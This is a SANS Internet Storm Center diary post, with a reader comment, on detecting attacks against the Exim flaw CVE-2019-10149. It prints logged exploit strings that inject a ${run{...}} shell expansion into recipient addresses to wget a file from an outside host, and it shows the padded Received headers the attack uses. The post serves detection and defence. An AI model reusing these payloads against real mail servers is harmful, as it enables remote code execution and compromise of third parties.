Threat Level: green Handler on Duty: Manuel Humberto Santander Pelaez

SANS ISC: Quick Detect: Exim "Return of the Wizard" Attack SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms: https://isctv.sans.edu

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Quick Detect: Exim "Return of the Wizard" Attack

Thanks to our reader Alex for sharing some of his mail logs with the latest attempts to exploit CVE-2019-10149 (aka "Return of the Wizard"). The vulnerability affects Exim and was patched about two weeks ago. There are likely still plenty of vulnerable servers, but it looks like attackers are branching out and are hitting servers not running Exim as well.

A couple of logs from our own mail server (running postfix):

Jun 19 10:47:10 mail postfix/smtp[19006]: A547240360F4: to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f70.91.145.10x22}}@dshield.org>, relay=204.51.94.153[204.51.94.153]:25, delay=0.82, delays=0.29/0.03/0.45/0.05, dsn=5.1.1, status=bounced (host 204.51.94.153[204.51.94.153] said: 550 5.1.1 <root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f70.91.145.10x22}}@dshield.org>: Recipient address rejected: User unknown in virtual alias table (in reply to RCPT TO command))

The exploit is attempting to run the following command:

/bin/sht-ct "wget 64.50.180.45/tmp/70.91.145.10"

Note that the IP at the end of the command is our mail servers public IP address. The URL does no longer appear to exist and belongs to a server running cPanel. 

The beginning of the command may actually be a mistake/typo. I believe the attacker is trying to run sh -ct, which would execute the string (wget..). 

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
Twitter|

I will be teaching next: Defending Web Applications Security Essentials - SANS San Francisco Winter 2019

Johannes

3679 Posts
ISC Handler
Help. I just got hit by this. Although my log does not show that it is bounced instead it got through to my maildir.

Jun 19 11:02:48 ceres postfix/local[5675]: 603BE14007A: to=<emailaddressremoved>, orig_to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2fxxx.xxx.xxx.xxxx22}}@mydomain>, relay=local, delay=0.52, delays=0.42/0.04/0/0.07, dsn=2.0.0, status=sent (delivered to maildir)

How do I fix this?

Here is the email that was received. All this is in the header. THe subject and body was blank.

Return-Path: <support@service.com>
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2fxxx.xxx.xxx.xxxx22}}@mydomain.com
Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f173.23.66.8x22}}@mydomain.com
Received: from service.com (unknown [45.55.94.254])
by mail.mydomain.com (Postfix) with SMTP id 603BE14007A;
Wed, 19 Jun 2019 11:02:48 -0500 (CDT)
Received: 1
Received: 2
Received: 3
Received: 4
Received: 5
Received: 6
Received: 7
Received: 8
Received: 9
Received: 10
Received: 11
Received: 12
Received: 13
Received: 14
Received: 15
Received: 16
Received: 17
Received: 18
Received: 19
Received: 20
Received: 21
Received: 22
Received: 23
Received: 24
Received: 25
Received: 26
Received: 27
Received: 28
Received: 29
Received: 30
Received: 31
Anonymous

Sign Up for Free or Log In to start participating in the conversation!